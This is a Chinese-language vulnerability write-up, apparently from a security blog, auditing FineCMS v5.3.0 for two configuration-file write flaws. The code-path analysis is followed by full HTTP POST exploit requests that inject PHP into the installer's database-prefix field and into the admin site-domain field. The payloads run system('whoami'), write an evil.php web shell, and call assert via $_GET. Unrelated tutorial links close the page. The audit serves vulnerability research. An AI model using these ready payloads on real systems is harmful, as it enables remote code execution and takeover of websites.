FineCMS 漏洞不仅皮囊好看,灵魂更有趣
0x00 背景
最近在挖掘FineCMS源码的漏洞,发现了一些有趣的洞,斗哥计划先从配置文件写入开始分析,然后再结合存储XSS进行GetShell,本篇先分析配置文件写入的问题,下周再分析存储XSS的问题,最终通过这两类洞的组合利用GetShell,大体思路流程很简单,但是代码分析中有蛮多技巧,期待与师傅们的交流讨论。
0x01 漏洞审计
1x00 相关环境
源码信息:FineCMS v5.3.0 bulid 20180206 问题文件: finecmsfinecmssystemcoreInput.php 漏洞类型:配置文件写入问题 站点地址:http://www.finecms.net/
1x01 漏洞分析
在finecmsfinecmsdayruicontrollersInstall.php文件中的第127-131行发现如下代码块。
通过反向追溯在当前文件中的第75行中发现$data的创建位置。
跟入post方法,在finecmsfinecmssystemcoreInput.php文件中的第255行中发现发 post方法的代码块。
跟入_fetch_from_array方法,在finecmsfinecmssystemcoreInput.php文件中的第177-230行中发现该方法的代码块,代码主要对传入的数组进行简单的数据判断,代码较多这里列出重要的代码,当$xss_clean为TRUE的时候会进行xss_clean操作。通过追溯$xss_clean变量,发现是从finecmsfinecmsdayruiconfigconfig.php配置文件中的$config['global_xss_filtering']获取的,但是默认情况下该变量的值为FALSE,不会进行任何的XSS过滤。
但是当$config['global_xss_filtering']为TRUE会进入finecmsfinecmssystemcoreSecurity.php的xss_clean方法进行XSS过滤,但是不进行单引号的转义,但是还过滤了PHP的标签和一些关键函数,由于还过滤了尖括号所以标签没想到绕过方法,但是可以使用类似system/*()*/('whoami')的方式绕过关键字的过滤规则进行代码执行。
因此此处可以引入单引号,从而导致写入php代码进行GetShell。
1x02 漏洞复现
在进行安装的时候,如果$config['global_xss_filtering']开启了,即TRUE,可构造如下请求可以执行PHP代码导致GetShell。
POST /index.php?c=install&m=index&step=3 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/index.php?c=install&m=index&step=3
Content-Length: 172
Connection: close
data%5Bdbhost%5D=127.0.0.1&data%5Bdbuser%5D=root&data%5Bdbpw%5D=root&data%5Bdbname%5D=FineCMS&data%5Bdbprefix%5D=fn_').die(system/*()*/('whoami'));array(//&data%5Bdemo%5D=1
如果$config['global_xss_filtering']未开启即为FALSE,进行如下请求可以GetShell。
POST /index.php?c=install&m=index&step=3 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/index.php?c=install&m=index&step=3
Content-Length: 195
Connection: close
data%5Bdbhost%5D=127.0.0.1&data%5Bdbuser%5D=root&data%5Bdbpw%5D=root&data%5Bdbname%5D=FineCMS&data%5Bdbprefix%5D=fn_'.die(fwrite(fopen('evil.php', 'w'), '<?php phpinfo();?>')),//&data%5Bdemo%5D=1成功写入文件并生成evil.php:
访问evil.php成功GetShell:
2x00 相关环境
源码信息:FineCMS v5.3.0 bulid 20180206 问题文件: finecmsfinecmsdayruilibrariesDconfig.php 漏洞类型:配置文件写入问题 站点地址:http://www.finecms.net/
2x01 漏洞分析
在文件finecmsfinecmsdayruicontrollersadminSite.php的第46-67行中发现如下代码块,使用post接收data的数据,然后在检测域名是否被使用,未被使用将更新数据库中fn_site表中的domain的字段。
跟入$this->site_model->cache(),在finecmsfinecmsdayruimodelsSite_model.php文件中的第323-368行中,发现cache()方法,重点看第325行和338行。
跟入$this->get_site_data()方法,在finecmsfinecmsdayruimodelsSite_model.php文件中的第285-300行发现代码块,分析代码块知道是进行如下的数据查询,把前面存到数据库中的配置,取出来然后赋给$data, 通过打印$data可以知道到的就是站点配置的信息。
跟进$t['domain'] && $domain[$t['domain']] = $id;,$domain最终传入了如下finecmsfinecmsdayruimodelsSite_model.php文件中的第363行代码。
因此foreach ($data as $id => $t)后对$domain[$t['domain']] = $id;进行赋值,其中为$domain变量传入了键名$t['domain'],又因为to_require_one中不会对数组的键名进行安全处理,因此可以引入单引号,存在文件写入的问题。
2x02 漏洞复现
可以通过构造如下请求进行文件写入,并执行代码的操作:
POST /admin.php?c=site&m=index&func=assert&evil=system('whoami') HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/admin.php?c=site&m=index
Content-Length: 95
Cookie: member_uid=1; member_cookie=398ecbf6b4b29dd1a5d0; 8b0cba072045805256806b2b24239ded_ci_session=09t3nk6i1l5bfevngel2clvbuf1504p8
Connection: close
ids[]=1&data[1][name]=FineCMS&data[1][domain]=127.0.0.1'=>1).die($_GET['func']($_GET['evil'])//
0x02小结
本篇仅列举了两处这类问题,其实该源码还有其他处文件写入问题,大家也可以自行审计去发现。留下个小疑问,这些后台的洞大家有啥办法从前台去利用呢?
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- PHP实现PDO操作mysql存储过程示例
- Python bisect模块原理及常见实例
- PHP的curl函数的用法总结
- Python函数的迭代器与生成器的示例代码
- PHP中检查isset()和!empty()函数的必要性
- python代码中怎么换行
- PHP让网站移动访问更加友好方法
- python代码区分大小写吗
- php面试中关于面向对象的相关问题
- python实现在线翻译
- Python字符串格式化常用手段及注意事项
- PHP count_chars()函数讲解
- 浅谈keras使用中val_acc和acc值不同步的思考
- PHP安装BCMath扩展的方法
- keras实现多GPU或指定GPU的使用介绍